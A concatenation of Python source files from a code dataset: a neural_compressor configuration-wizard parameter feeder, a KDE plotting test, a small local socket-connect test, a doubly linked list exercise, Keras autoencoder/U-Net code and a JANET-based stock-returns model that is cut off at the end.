load_help_nc_params,\n load_model_config,\n load_precisions_config,\n load_transforms_config,\n)\nfrom neural_compressor.ux.web.configuration import Configuration\n\n\nclass Feeder:\n \"\"\"Parameters feeder class.\"\"\"\n\n def __init__(self, data: Dict[str, Any]) -> None:\n \"\"\"Initialize parameters feeder class.\"\"\"\n self.param: Optional[str] = data.get(\"param\")\n self.config: Dict[str, Any] = data.get(\"config\", {})\n\n def feed(self) -> Dict[str, Any]:\n \"\"\"Feed the parameters.\"\"\"\n param_mapper = {\n \"framework\": self.get_frameworks,\n \"domain\": self.get_domains,\n \"model\": self.get_models,\n \"dataloader\": self.get_dataloaders,\n \"transform\": self.get_transforms,\n \"objective\": self.get_objectives,\n \"strategy\": self.get_strategies,\n \"quantization_approach\": self.get_quantization_approaches,\n \"metric\": self.get_metrics,\n \"precision\": self.get_precisions,\n }\n if self.param is None:\n raise ClientErrorException(\"Parameter not defined.\")\n get_param = param_mapper.get(self.param, None)\n if get_param is None:\n raise ClientErrorException(\n f\"Could not found method for {self.param} parameter.\",\n )\n\n return {\n self.param: get_param(),\n }\n\n @staticmethod\n def get_frameworks() -> List[dict]:\n \"\"\"Get list of available frameworks.\"\"\"\n supported_frameworks = ModelRepository.get_supported_frameworks()\n frameworks = []\n models_config = load_model_config()\n for framework in models_config.keys():\n if framework.startswith(\"__help__\"):\n continue\n if framework not in supported_frameworks:\n continue\n help_msg = models_config.get(f\"__help__{framework}\", \"\")\n frameworks.append({\"name\": framework, \"help\": help_msg})\n return frameworks\n\n def get_domains(self) -> List[Dict[str, Any]]:\n \"\"\"Get list of available domains.\"\"\"\n framework = self.config.get(\"framework\", None)\n if framework is None:\n raise ClientErrorException(\"Framework not set.\")\n models_config = load_model_config()\n domains = []\n for domain in models_config.get(framework, {}).keys():\n if domain.startswith(\"__help__\"):\n continue\n help_msg = models_config.get(framework, {}).get(f\"__help__{domain}\", \"\")\n domains.append(\n {\n \"name\": domain,\n \"help\": help_msg,\n },\n )\n return domains\n\n def get_models(self) -> List[Dict[str, Any]]:\n \"\"\"Get list of models.\"\"\"\n framework = self.config.get(\"framework\", None)\n if framework is None:\n raise ClientErrorException(\"Framework not set.\")\n domain = self.config.get(\"domain\", None)\n if domain is None:\n raise ClientErrorException(\"Domain not set.\")\n models_config = load_model_config()\n\n raw_models_dict = models_config.get(framework, {}).get(domain, {})\n models = []\n for model in raw_models_dict.keys():\n if model.startswith(\"__help__\"):\n continue\n help_msg = raw_models_dict.get(f\"__help__{model}\", \"\")\n models.append({\"name\": model, \"help\": help_msg})\n return models\n\n def get_dataloaders(self) -> List[Dict[str, Any]]:\n \"\"\"Get available dataloaders.\"\"\"\n framework = self.config.get(\"framework\", None)\n if framework is None:\n raise ClientErrorException(\"Framework not set.\")\n for fw_dataloader in load_dataloader_config():\n if fw_dataloader.get(\"name\") == framework:\n return fw_dataloader.get(\"params\", [])\n return []\n\n def get_transforms(self) -> List[Dict[str, Any]]:\n \"\"\"Get available transforms.\"\"\"\n framework = self.config.get(\"framework\", None)\n if framework is None:\n raise ClientErrorException(\"Framework not set.\")\n domain = self.config.get(\"domain\", None)\n transforms = []\n for fw_transforms in load_transforms_config():\n if fw_transforms.get(\"name\") == framework:\n transforms = fw_transforms.get(\"params\", [])\n break\n if domain is not None:\n transforms = filter_transforms(transforms, framework, domain)\n return transforms\n\n @staticmethod\n def get_objectives() -> List[dict]:\n \"\"\"Get list of supported objectives.\"\"\"\n help_dict = load_help_nc_params(\"objectives\")\n\n objectives = []\n for objective in OBJECTIVES.keys():\n help_msg = help_dict.get(f\"__help__{objective}\", \"\")\n objectives.append({\"name\": objective, \"help\": help_msg})\n return objectives\n\n @staticmethod\n def get_strategies() -> List[Dict[str, Any]]:\n \"\"\"Get list of supported strategies.\"\"\"\n help_dict = load_help_nc_params(\"strategies\")\n strategies = []\n for strategy in STRATEGIES.keys():\n if \"sigopt\" == strategy:\n continue\n help_msg = help_dict.get(f\"__help__{strategy}\", \"\")\n strategies.append({\"name\": strategy, \"help\": help_msg})\n return strategies\n\n def get_precisions(self) -> List[dict]:\n \"\"\"Get list of available precisions.\"\"\"\n framework = self.config.get(\"framework\", None)\n if framework is None:\n raise ClientErrorException(\"Framework not set.\")\n return load_precisions_config().get(framework, [])\n\n def get_quantization_approaches(self) -> List[Dict[str, Any]]:\n \"\"\"Get list of supported quantization approaches.\"\"\"\n approaches = [\n {\n \"name\": \"post_training_static_quant\",\n \"help\": \"help placeholder for post_training_static_quant\",\n },\n ]\n framework = self.config.get(\"framework\", None)\n if framework in [\"pytorch\", \"onnxrt\"]:\n approaches.append(\n {\n \"name\": \"post_training_dynamic_quant\",\n \"help\": f\"help placeholder for {framework} post_training_dynamic_quant\",\n },\n )\n\n return approaches\n\n def get_metrics(self) -> List[Dict[str, Any]]:\n \"\"\"Get list of possible metrics.\"\"\"\n framework = self.config.get(\"framework\", None)\n if framework is None:\n raise ClientErrorException(\"Framework not set.\")\n\n if framework == \"pytorch\":\n check_module(\"ignite\")\n else:\n check_module(framework)\n\n help_dict = load_help_nc_params(\"metrics\")\n\n key_in_framework_metrics = \"onnxrt_qlinearops\" if framework == \"onnxrt\" else framework\n metrics_class = framework_metrics.get(key_in_framework_metrics)\n raw_metric_list = list(metrics_class().metrics.keys()) if metrics_class else []\n raw_metric_list += [\"custom\"]\n metrics_updated = _update_metric_parameters(raw_metric_list)\n for metric, value in metrics_updated.copy().items():\n if isinstance(value, dict):\n for key in value.copy().keys():\n for field in [\"help\", \"label\"]:\n msg_key = f\"__{field}__{key}\"\n metrics_updated[metric][msg_key] = help_dict.get(\n metric,\n {},\n ).get(msg_key, \"\")\n metrics_updated[f\"__help__{metric}\"] = help_dict.get(\n f\"__help__{metric}\",\n \"\",\n )\n return self._parse_help_in_dict(metrics_updated)\n\n def _parse_help_in_dict(self, data: dict) -> list:\n parsed_list = []\n for key, value in data.items():\n if key.startswith(\"__help__\") or key.startswith(\"__label__\"):\n continue\n if isinstance(value, dict):\n parsed_list.append(\n {\n \"name\": key,\n \"help\": data.get(f\"__help__{key}\", \"\"),\n \"params\": self._parse_help_in_dict(value),\n },\n )\n else:\n item = {\n \"name\": key,\n \"help\": data.get(f\"__help__{key}\", \"\"),\n \"value\": value,\n }\n label = data.get(f\"__label__{key}\")\n if label:\n item[\"label\"] = label\n parsed_list.append(item)\n return parsed_list\n\n\ndef _update_metric_parameters(metric_list: List[str]) -> Dict[str, Any]:\n \"\"\"Add parameters to metrics.\"\"\"\n metrics: Dict[str, Any] = {}\n for metric in metric_list:\n if metric == \"topk\":\n metrics.update({metric: {\"k\": [1, 5]}})\n elif metric == \"COCOmAP\":\n annotation_path = os.path.join(Configuration().workdir, \"label_map.yaml\")\n metrics.update({metric: {\"anno_path\": annotation_path}})\n elif metric in [\"MSE\", \"RMSE\", \"MAE\"]:\n metrics.update({metric: {\"compare_label\": True}})\n else:\n metrics.update({metric: None})\n return metrics\n\n\ndef get_possible_values(data: dict) -> Dict[str, List[Any]]:\n \"\"\"Get list of possible values for specified scenario with \"help\" information.\"\"\"\n feeder = Feeder(data)\n return feeder.feed()\n","sub_path":"neural_compressor/ux/components/configuration_wizard/params_feeder.py","file_name":"params_feeder.py","file_ext":"py","file_size_in_byte":10650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"512633342","text":"import numpy as np\nimport matplotlib.pylab as plt\nimport scipy.stats\n\n\n\nnsamp = 10000\n\nx0 = 5\nxsd = 3\n\ny0 = 9\nysd = 1.\n\nnbinx = 100\nnbiny = 100\n\n\ncov = np.zeros((2,2))\ncov[0,0] = xsd**0.5\ncov[1,1,] = ysd**0.5\n\n\n\n\nsamp = np.random.multivariate_normal([x0,y0],cov,nsamp)\nx = samp[:,0]\ny = samp[:,1]\n\nxlimlo = np.min(x)\nxlimhi = np.max(x)\nbinwidth_x = (xlimhi - xlimlo)/(nbinx - 1)\n\nylimlo = np.min(y)\nylimhi = np.max(y)\nbinwidth_y = (ylimhi - ylimlo)/(nbiny - 1)\n\n\nboth = np.array((x,y)).T\npdf1=scipy.stats.kde.gaussian_kde(both.T)\nq,w=np.meshgrid(np.arange(xlimlo,xlimhi,binwidth_x), np.arange(ylimlo,ylimhi,binwidth_y))\nr1=pdf1([q.flatten(),w.flatten()])\nr1.shape=(q.shape[0],q.shape[1])\n\n\nplt.scatter(samp[:,0], samp[:,1])\nplt.contour(np.arange(xlimlo,xlimhi,binwidth_x), np.arange(ylimlo,ylimhi,binwidth_y), r1)\n\nplt.show()\n\n","sub_path":"pythontests/test_kde.py","file_name":"test_kde.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"402655943","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 2 19:46:03 2018\n\n@author: hsf\n\"\"\"\n#import texasfunction as tf\n#import texas_predict as tp\n#\n#player_tmp1 = tf.usr(\"robot1\") \n#player_tmp1.handcards([39,40])\n#player_tmp2 = tf.usr(\"robot2\") \n#player_tmp2.handcards([39,46])\n#player_tmp3 = tf.usr(\"robot3\") \n#player_tmp3.handcards([39,42])\n#player_tmp3.drop = 1\n#player_tmp2.drop = 1\n#\n#\n#cards=[14,15,16]\n#print(tp.predict_self(player_tmp1, cards, 3, 2, 10))\n#print(tp.predict_all([player_tmp1,player_tmp2,player_tmp3], cards, 10))\n\n#ss = input(\"input:\")\n#if ss.isdigit():\n# print('%s%s' % (ss,ss))\n \nimport socket\nfrom errno import *\nsocket.setdefaulttimeout(0.01)\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n#try:\n# sock.connect((\"192.168.1.211\", 5005))\n#except socket.timeout as e:\n# print(\"timeout\")\n# pass\n\n\nerr = sock.connect_ex((\"192.168.1.211\", 5005))\nprint(err)\nif err == EWOULDBLOCK:\n print('1')","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"58238121","text":"\"\"\"Each ListNode holds a reference to its previous node\nas well as its next node in the List.\"\"\"\nclass ListNode:\n def __init__(self, value, prev=None, next=None):\n self.value = value\n self.prev = prev\n self.next = next\n\n \"\"\"Wrap the given value in a ListNode and insert it\n after this node. Note that this node could already\n have a next node it is pointing to.\"\"\"\n def insert_after(self, value):\n current_next = self.next\n self.next = ListNode(value, self, current_next)\n if current_next:\n current_next.prev = self.next\n\n \"\"\"Wrap the given value in a ListNode and insert it\n before this node. Note that this node could already\n have a previous node it is point to.\"\"\"\n def insert_before(self, value):\n current_prev = self.prev\n self.prev = ListNode(value, current_prev, self)\n if current_prev:\n current_prev.next = self.prev\n\n \"\"\"Rearranges this ListNode's previous and next pointers\n accordingly, effectively deleting this ListNode.\"\"\"\n def delete(self):\n if self.prev:\n self.prev.next = self.next\n if self.next:\n self.next.prev = self.prev\n\n# ==================================================Doubly Linked List========================================================== #\n\n\"\"\"Our doubly-linked list class. It holds references to\nthe list's head and tail nodes.\"\"\"\nclass DoublyLinkedList:\n def __init__(self, node=None):\n self.head = node\n self.tail = node\n self.length = 1 if node is not None else 0\n\n def __len__(self):\n return self.length\n\n def add_to_head(self, value):\n # if theres a value create new node\n new_head = ListNode(value)\n if self.head is None and self.tail is None:\n self.head = new_head\n self.tail = new_head\n else:\n # add new node before current head node\n self.head.insert_before(value)\n # change head node to new node\n self.head = self.head.prev\n # increment count\n self.length += 1\n\n def remove_from_head(self):\n if self.head == None:\n return None\n\n current_head = self.head\n if self.head.next == None:\n self.head = None\n self.tail = None\n else:\n new_head = self.head.next\n self.head.delete()\n self.head = new_head\n self.length -= 1\n return current_head.value\n\n\n def add_to_tail(self, value):\n # if theres a value create new node\n if self.tail is None:\n new_tail= ListNode(value)\n if self.head is None:\n self.head = new_tail\n self.tail = new_tail\n else:\n # add new node before current head node\n self.tail.insert_after(value)\n # change head node to new node\n self.tail = self.tail.next\n # increment count\n self.length += 1\n\n def remove_from_tail(self):\n if self.tail == None:\n return None\n \n current_tail = self.tail\n if self.tail.prev == None:\n self.head = None\n self.tail = None\n else:\n new_tail = self.tail.prev\n self.tail.delete()\n self.tail = new_tail\n self.length -= 1\n return current_tail.value\n\n def move_to_front(self, node):\n if node is self.tail:\n self.remove_from_tail()\n self.add_to_head(node)\n else:\n self.delete(node)\n self.add_to_head(node)\n\n def move_to_end(self, node):\n if node is self.head:\n self.remove_from_head()\n else:\n self.delete(node)\n self.add_to_tail(node)\n\n # work on this further\n def delete(self, node):\n if self.length == 1:\n self.head = None\n self.tail = None\n self.length = 0\n return node.value\n if node.prev is not None:\n node.prev.next = node.next\n else:\n node.prev.next = None\n if node.next is not None:\n node.next.prev = node.prev\n else:\n node.next.prev = None\n self.length -= 1\n return node.value\n \n # work on this further\n def get_max(self):\n current_max = self.head.value\n current_node = self.head\n while current_node is not None:\n if current_node.value > current_max:\n current_max = current_node.value\n current_node = current_node.next\n return current_max\n\n\n\n# # test add to head initial\n# test_list = DoublyLinkedList()\n# test_list.add_to_head(1)\n# print(\"list length: \", test_list.length)\n# # test add to head after head has one item\n# test_list.add_to_head(2)\n# print(\"list length: \", test_list.length)\n\n# print()\n# # test remove from head\n# print(\"REMOVE HEAD\")\n# print(\"removed head: \", test_list.remove_from_head())\n# print(\"new head: \", test_list.head.value)\n# print(\"list length: \", test_list.length)\n\n# print()\n# # test add to tail\n# print(\"ADD TO TAIL\")\n# test_list.add_to_tail(3)\n# print(\"list length: \", test_list.length)\n# print(\"add 3 to tail: \", test_list.tail.value)\n\n# print()\n# # test remove from head\n# print(\"REMOVE TAIL\")\n# print(\"old tail: \", test_list.tail.value)\n# print(\"removed tail: \", test_list.remove_from_tail())\n# print(\"new tail: \", test_list.tail.value)\n# print(\"list length: \", test_list.length)\n\n# test_list.add_to_tail(2)\n# test_list.add_to_tail(3)\n# test_list.add_to_tail(4)\n# test_list.add_to_tail(5)\n\n# print()\n# print(\"created list of 1 to 5\")\n\n# print(\"test_list\")\n# print(test_list.head.value)\n# print(test_list.head.next.value)\n# print(test_list.head.next.next.value)\n# print(test_list.head.next.next.next.value)\n# print(test_list.head.next.next.next.next.value)\n\n# print()\n# print(\"test_list.delete(3): \", test_list.delete(test_list.head.next.next))\n\n# print()\n# print(test_list.head.value)\n# print(test_list.head.next.value)\n# print(test_list.head.next.next.value)\n# print(test_list.head.next.next.next.value)\n\n# print(\"max: \", test_list.get_max())","sub_path":"doubly_linked_list/doubly_linked_list.py","file_name":"doubly_linked_list.py","file_ext":"py","file_size_in_byte":5596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"653234348","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras.models import *\nfrom keras.layers import *\nfrom keras.optimizers import *\nimport scipy\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\ndef imageReader(image):\n pass\n\ndef weight_variable(shape):\n weights = tf.get_variable(\"weights\", shape=shape, initializer=tf.random_normal_initializer())\n return weights\n\n\ndef biases_varialbe(shape):\n biases = tf.get_variable(\"biases\", shape=shape, initializer=tf.constant_initializer())\n return biases\n\n\ndef conv2d(x, W):\n output = tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n return output\n\n\ndef max_pool(x):\n output = tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n return output\n\n\ndef net(image, reuse=False, name='net'):\n with tf.variable_scope(name):\n if reuse:\n tf.get_variable_scope().reuse_variables()\n else:\n assert tf.get_variable_scope().reuse is False\n\n inputs_ = tf.placeholder(tf.float32, (None, 28, 28, 1), name='inputs')\n targets_ = tf.placeholder(tf.float32, (None, 28, 28, 1), name='targets')\n\n ## encode\n conv1 = tf.layers.conv2d(inputs_, 16, (3, 3), padding='same', activation=tf.nn.relu)\n # 当前shape: 28x28x16\n maxpool1 = tf.layers.max_pooling2d(conv1, (2, 2), (2, 2), padding='same')\n # 当前shape: 14x14x16\n conv2 = tf.layers.conv2d(maxpool1, 8, (3, 3), padding='same', activation=tf.nn.relu)\n # 当前shape: 14x14x8\n maxpool2 = tf.layers.max_pooling2d(conv2, (2, 2), (2, 2), padding='same')\n # 当前shape: 7x7x8\n conv3 = tf.layers.conv2d(maxpool2, 8, (3, 3), padding='same', activation=tf.nn.relu)\n # 当前shape: 7x7x8\n encoded = tf.layers.max_pooling2d(conv3, (2, 2), (2, 2), padding='same')\n # 当前shape: 4x4x8\n\n ## decode\n upsample1 = tf.image.resize_nearest_neighbor(encoded, (7, 7))\n # 当前shape: 7x7x8\n conv4 = tf.layers.conv2d(upsample1, 8, (3, 3), padding='same', activation=tf.nn.relu)\n # 当前shape: 7x7x8\n upsample2 = tf.image.resize_nearest_neighbor(conv4, (14, 14))\n # 当前shape: 14x14x8\n conv5 = tf.layers.conv2d(upsample2, 8, (3, 3), padding='same', activation=tf.nn.relu)\n # 当前shape: 14x14x8\n upsample3 = tf.image.resize_nearest_neighbor(conv5, (28, 28))\n # 当前shape: 28x28x8\n conv6 = tf.layers.conv2d(upsample3, 16, (3, 3), padding='same', activation=tf.nn.relu)\n # 当前shape: 28x28x16\n\n logits = tf.layers.conv2d(conv6, 1, (3, 3), padding='same', activation=None)\n # 当前shape: 28x28x1\n\n decoded = tf.nn.sigmoid(logits, name='decoded')\n\n # 计算损失函数\n loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=targets_, logits=logits)\n cost = tf.reduce_mean(loss)\n # 使用adam优化器优化损失函数\n opt = tf.train.AdamOptimizer(0.001).minimize(cost)\n\n sess = tf.Session()\n epochs = 100\n sess.run(tf.global_variables_initializer())\n for i in range(epochs):\n for j in range(30):\n batch = imageReader(image)[j]\n imgs = batch.reshape((-1, 100, 100, 1))\n batch_cost = sess.run([cost, opt], feed_dict={inputs_: imgs, targets_: imgs})\n if i % 10 == 0:\n print('Epoch:' + i + '/100...Training loss:' + batch_cost)\n\n\ndef unet(inputs, input_size=(256, 256, 3)):\n conv1 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(inputs)\n conv1 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2), data_format='channels_last')(conv1)\n conv2 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(pool1)\n conv2 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2), data_format='channels_last')(conv2)\n conv3 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(pool2)\n conv3 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n conv4 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(pool3)\n conv4 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv4)\n drop4 = Dropout(0.5)(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2), data_format='channels_last')(drop4)\n\n conv5 = Conv2D(1024, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(pool4)\n conv5 = Conv2D(1024, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv5)\n drop5 = Dropout(0.5)(conv5)\n\n up6 = Conv2D(512, 2, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(\n UpSampling2D(size=(2, 2), data_format='channels_last')(drop5))\n # merge6 = concatenate([drop4, up6], axis=3)\n conv6 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(up6)\n conv6 = Conv2D(512, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv6)\n\n up7 = Conv2D(256, 2, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(\n UpSampling2D(size=(2, 2), data_format='channels_last')(conv6))\n # merge7 = concatenate([conv3, up7], axis=3)\n conv7 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(up7)\n conv7 = Conv2D(256, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv7)\n\n up8 = Conv2D(128, 2, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(\n UpSampling2D(size=(2, 2), data_format='channels_last')(conv7))\n # merge8 = concatenate([conv2, up8], axis=3)\n conv8 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(up8)\n conv8 = Conv2D(128, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv8)\n\n up9 = Conv2D(64, 2, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(\n UpSampling2D(size=(2, 2), data_format='channels_last')(conv8))\n # merge9 = concatenate([conv1, up9], axis=3)\n conv9 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(up9)\n conv9 = Conv2D(64, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv9)\n conv9 = Conv2D(2, 3, activation='relu', padding='same', kernel_initializer='he_normal', data_format='channels_last')(conv9)\n conv10 = Conv2D(1, 1, activation='sigmoid', data_format='channels_last')(conv9)\n\n model = Model(inputs=inputs, outputs=conv10)\n\n model.compile(optimizer=Adam(lr=1e-4), loss='binary_crossentropy', metrics=['accuracy'])\n\n return model","sub_path":"Python code/DL_Test/MyNet/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":7552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159682741","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 24 16:17:21 2019\n\n@author: evrardgarcelon\n\"\"\"\n\nfrom keras.layers import (Dense, Dropout, Embedding, PReLU, SpatialDropout1D,\n concatenate, Flatten, MaxPooling1D, RepeatVector,\n LSTM, Bidirectional, BatchNormalization, Reshape)\nfrom keras.models import Model, Input\nimport keras\n\n\nfrom src.models.nn.model import GeneralLSTM\nfrom src.models.nn.janet import JANET\n\n\nclass NotSoSmallLSTM(GeneralLSTM):\n def __init__(self,\n data,\n eqt_embeddings_size=20,\n lstm_out_dim=150,\n dropout_rate=0.5,\n dropout_spatial_rate=0.5,\n dropout_lstm=0.5,\n dropout_lstm_rec=0.5,\n loss='binary_crossentropy',\n optimizer=None):\n super(NotSoSmallLSTM, self).__init__(\n data,\n eqt_embeddings_size=eqt_embeddings_size,\n lstm_out_dim=lstm_out_dim,\n use_lstm=True,\n dropout_rate=dropout_rate,\n dropout_spatial_rate=dropout_spatial_rate,\n dropout_lstm=dropout_lstm,\n dropout_lstm_rec=dropout_lstm_rec,\n loss=loss,\n optimizer=optimizer)\n\n self.model, self.inputnames = self.create_model()\n\n def create_model(self):\n \n ### Context equity day\n eqt_code_input = Input(shape=[1], name='eqt_code_input')\n eqt_emb = Embedding(\n output_dim=self.eqt_embeddings_size,\n input_dim=self.n_eqt,\n input_length=1,\n name='eqt_embeddings')(eqt_code_input)\n eqt_emb = SpatialDropout1D(self.dropout_spatial_rate)(eqt_emb)\n eqt_emb = Reshape((self.eqt_embeddings_size,1))(eqt_emb)\n# eqt_emb = Flatten()(eqt_emb)\n# \n# date_input = Input(shape=[1], name='date_input')\n# date_emb= Embedding(\n# output_dim=self.eqt_embeddings_size,\n# input_dim=1512,\n# input_length=1,\n# name='date_embeddings')(date_input)\n# date_emb = SpatialDropout1D(self.dropout_spatial_rate)(date_emb)\n# date_emb = Reshape((self.eqt_embeddings_size,1))(date_emb)\n\n# date_emb = Flatten()(date_emb)\n \n nb_eqt_traded_input = Input(shape=[1], name='nb_eqt_traded_input')\n nb_eqt_traded_emb = Embedding(\n output_dim=self.eqt_embeddings_size//2,\n input_dim=self.n_eqt,\n input_length=1,\n name='nb_eqt_traded_emb')(nb_eqt_traded_input)\n nb_eqt_traded = Dropout(self.dropout_spatial_rate)(nb_eqt_traded_emb)\n nb_eqt_traded = Flatten()(nb_eqt_traded)\n \n nb_nan_input = Input(shape=[1], name='nb_nan_input')\n nb_nans_data_emb = Embedding( output_dim=self.eqt_embeddings_size//2,\n input_dim=72,\n input_length=1)(nb_nan_input)\n nb_nans_data = Dropout(self.dropout_spatial_rate)(nb_nans_data_emb)\n nb_nans_data = Flatten()(nb_nans_data)\n \n nb_days_eqt_traded_input = Input(shape=[1], name='nb_days_eqt_traded_input')\n nb_days_eqt_traded = Embedding( output_dim=self.eqt_embeddings_size//2,\n input_dim=1512,\n input_length=1)(nb_days_eqt_traded_input)\n nb_days_eqt_traded = Dropout(self.dropout_spatial_rate)(nb_days_eqt_traded)\n nb_days_eqt_traded = Flatten()(nb_days_eqt_traded)\n \n context_eqt_day = concatenate([nb_eqt_traded,nb_nans_data,nb_days_eqt_traded])\n context_eqt_day = Dense(32, activation = 'linear')(context_eqt_day)\n context_eqt_day = PReLU()(context_eqt_day)\n context_eqt_day = Dropout(self.dropout_rate)(context_eqt_day)\n context_eqt_day = BatchNormalization()(context_eqt_day)\n# \n ### Temporal informations\n returns_input = Input(shape=(self.returns_length, 1), name='returns_input')\n \n market_returns_input = Input(shape=(self.returns_length, 1), name='market_returns_input')\n# \n eqt_avg_returns_input = Input(shape=(self.returns_length, 1), name='eqt_avg_returns_input')\n#\n # ewma_input = Input(shape=(self.returns_length, 1), name='ewma_rolling_input')\n# \n# std_input = Input(shape=(self.returns_length, 1), name='var_rolling_input')\n# \n returns_eqt = concatenate([returns_input, eqt_emb], axis = 1)\n \n \n market_returns_features = JANET(\n self.lstm_out_dim//2,\n return_sequences=False,\n dropout=self.dropout_lstm,\n recurrent_dropout=self.dropout_lstm_rec, unroll = False,\n kernel_initializer='random_uniform')(market_returns_input)\n \n eqt_avg_returns_features = JANET(\n self.lstm_out_dim//2,\n return_sequences=False,\n dropout=self.dropout_lstm,\n recurrent_dropout=self.dropout_lstm_rec, unroll = False,\n kernel_initializer='random_uniform')(eqt_avg_returns_input)\n \n returns_features = JANET(\n self.lstm_out_dim,\n return_sequences=False,\n dropout=self.dropout_lstm,\n recurrent_dropout=self.dropout_lstm_rec, unroll = False,\n kernel_initializer='random_uniform')(returns_eqt)\n \n # rolling_features = JANET(\n # self.lstm_out_dim,\n # return_sequences=False,\n # dropout=self.dropout_lstm,\n # recurrent_dropout=self.dropout_lstm_rec, unroll = False,\n # kernel_initializer='random_uniform')(ewma_input) \n # var_returns = JANET(\n # self.lstm_out_dim,\n # return_sequences=False,\n # dropout=self.dropout_lstm,\n # recurrent_dropout=self.dropout_lstm_rec, unroll = False,\n # kernel_initializer='random_uniform')(std_input)\n \n# diff_to_market_features = JANET(\n# self.lstm_out_dim,\n# return_sequences=False,\n# dropout=self.dropout_lstm,\n# recurrent_dropout=self.dropout_lstm_rec, unroll = False,\n# kernel_initializer='random_uniform')(difference_to_market)\n# \n# diff_to_eqt_features = JANET(\n# self.lstm_out_dim,\n# return_sequences=False,\n# dropout=self.dropout_lstm,\n# recurrent_dropout=self.dropout_lstm_rec, unroll = False,\n# kernel_initializer='random_uniform')(diference_to_eqt)\n \n \n market_features = concatenate([returns_features,\n eqt_avg_returns_features,\n market_returns_features])\n\n return_features = Dense(self.lstm_out_dim,activation = 'linear')(returns_features)\n return_features = PReLU()(return_features)\n return_features = Dropout(self.dropout_rate)(return_features)\n return_features = BatchNormalization()(return_features)\n \n market_features = Dense(self.lstm_out_dim,activation = 'linear')(market_features)\n market_features = PReLU()(market_features)\n market_features = Dropout(self.dropout_rate)(market_features)\n market_features = BatchNormalization()(market_features)\n \n \n # return_market_features = concatenate([market_features, return_features])\n # return_market_features = Dense(64,activation = 'linear')(return_market_features)\n # return_market_features = PReLU()(return_market_features)\n # return_market_features = Dropout(self.dropout_rate)(return_market_features)\n # return_market_features = BatchNormalization()(return_market_features)\n \n \n ###Handmade Features input\n handmade_features_input = Input(shape = (len(self.non_return_cols)-2,), \n name = 'handmade_features')\n handmade_features = Dense(64, activation = 'linear')(handmade_features_input)\n handmade_features = PReLU()(handmade_features)\n handmade_features = Dropout(self.dropout_rate)(handmade_features)\n handmade_features = BatchNormalization()(handmade_features)\n \n ### Final Concatenation\n x = concatenate([context_eqt_day,return_features,market_features,handmade_features_input])\n \n x = Dense(64,activation = 'linear')(x)\n \n x = PReLU()(x)\n \n x = Dropout(self.dropout_rate)(x)\n \n x = BatchNormalization()(x)\n \n# x = Dense(128,activation = 'linear')(x)\n# \n# x = PReLU()(x)\n#\n# x = Dropout(self.dropout_rate)(x)\n# \n# x = BatchNormalization()(x)\n \n output = Dense(2,activation = 'softmax',name = 'output')(x)\n\n \n model = Model(\n inputs=[eqt_code_input,\n nb_eqt_traded_input,\n nb_nan_input,\n nb_days_eqt_traded_input,\n returns_input,\n market_returns_input,\n eqt_avg_returns_input,\n handmade_features_input],\n outputs=[output])\n\n inputs = [\"eqt_code_input\",\n \"nb_eqt_traded\",\n \"nb_nans_data\",\n \"nb_days_eqt_traded\",\n \"returns_input\",\n \"market_returns_input\",\n \"eqt_avg_returns\",\n \"handmade_features_input\"\n ]\n return model, inputs\n \n\n\nif __name__ == '__main__':\n from src.tools.experiment import Experiment\n from src.tools.dataloader import Data\n from src.tools.utils import plot_training\n\n KFOLDS = 0\n EPOCHS = 200\n \n exp = Experiment(modelname=\"not_small_janet\")\n data = Data(\n small=False, 